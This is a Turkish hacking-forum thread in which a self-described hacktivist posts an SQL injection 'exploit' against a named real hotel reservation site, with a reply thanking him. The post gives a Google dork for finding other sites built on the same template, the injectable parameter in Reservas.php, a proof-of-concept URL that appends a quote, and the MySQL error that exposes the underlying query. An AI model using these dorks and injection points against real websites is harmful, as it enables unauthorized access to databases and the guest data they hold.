Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Hoteliraqua 2013 SQL Inj Exploit
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,386 / 1,386
Deneyim: 47 / 100
Rep Sayısı: 2876
Mesaj Sayısı: 6513
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Hoteliraqua 2013 SQL Inj Exploit
07.09.2018 05:31
################################################################################​#################

# Exploit Title : Hoteliraqua Todos los Derechos Reservados © 2013 SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/09/2018
# Vendor Homepage : hoteliraqua.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork : intext:''www.hoteliraqua.com - Todos los Derechos Reservados © 2013''

# Exploit : /Reservas.php?id=[SQL Inj]

################################################################################​#################

# Example Site => hoteliraqua.com/Reservas.php?id=5%27 => [ Proof of Concept ] => archive.is/tOVc9

# SQL Database Error =>

Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''5''' at line 1
SELECT `Content`,`Title`,`Menu` FROM site_web WHERE PageID = '5''

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti
DARKDAYS
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 30
Yaşam Puanı: 734 / 734
Deneyim: 38 / 100
Rep Sayısı: 458
Mesaj Sayısı: 1219
Üyelik Tarihi: 08.04.2017
      
Yorum: #2
Cvp: Hoteliraqua 2013 SQL Inj Exploit
07.09.2018 16:53
Teşekkürler, Emeğine Sağlık Smile

Parmak uçlarına bak, parmak izlerini görüceksin ve o izlerden ne önce, ne şimdi, ne daha sonra olucak.
Dünya üzerinde 150 Milyar insan yaşamış, biri o parmak izlerine sahip değil !

MİRROR
Alinti



1 Ziyaretçi